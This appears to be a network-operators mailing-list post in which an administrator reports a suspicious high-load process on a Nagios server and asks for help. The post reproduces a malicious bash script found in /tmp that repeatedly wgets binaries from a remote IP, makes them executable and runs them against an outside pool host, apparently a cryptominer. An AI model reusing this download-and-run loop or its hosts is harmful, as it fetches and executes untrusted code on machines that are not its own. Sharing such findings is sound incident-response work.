Hi all, Not usually a post you see on uknof, but wanted some help and to check if anyone else has seen this?
We've just started getting alerts from one of our servers for highload and discovered a weird process: nagios 285936 0.0 0.0 10744 1468 ? S 19:03 0:00 bash /tmp/toplel nagios 292199 102 0.5 3261868 362816 ? Rl 19:39 0:15 \_ /tmp/w00t -d 0 -o http://128.65.210.244:8080 -u Seegee.lin -p 1 -s 2965706752 root@hostname:/tmp# ls -lh total 1016K -rw-r--r-- 1 nagios nagios 0 Apr 20 18:26 lllll -rwxrwxrwx 1 nagios nagios 615 Apr 20 19:05 toplel -rwxrwxrwx 1 nagios nagios 1008K Apr 19 21:59 w00t No idea where it came from. All our stuff has OpenSSL updated as is our Nagios. w00t is a binary, toplel is a bash script containing: #!/bin/bash if [ $1 -le 10 ] ; then NUM = $(expr $1 + 1) nohup bash $0 $NUM >/dev/null 2>&1 & exit fi CORECOUNT=$(cat /proc/cpuinfo | grep -c processor) FREE=$(free -b | head -n2 | tail -n1 | awk '{print $4}') FREE=$(expr $FREE - 52428800) FREE=$(expr $FREE / $CORECOUNT) while true; do killall w00t wget http://162.213.24.40/nope-sse4 -O /tmp/w00t chmod 777 /tmp/w00t /tmp/w00t -d 0 -o http://128.65.210.244:8080 -u Seegee.lin -p 1 -s $FREE wget http://162.213.24.40/nope-nse4 -O /tmp/w00t chmod 777 /tmp/w00t /tmp/w00t -d 0 -o http://128.65.210.244:8080 -u Seegee.lin -p 1 -s $FREE sleep 300 done; -- Kind Regards, Gavin Henry.
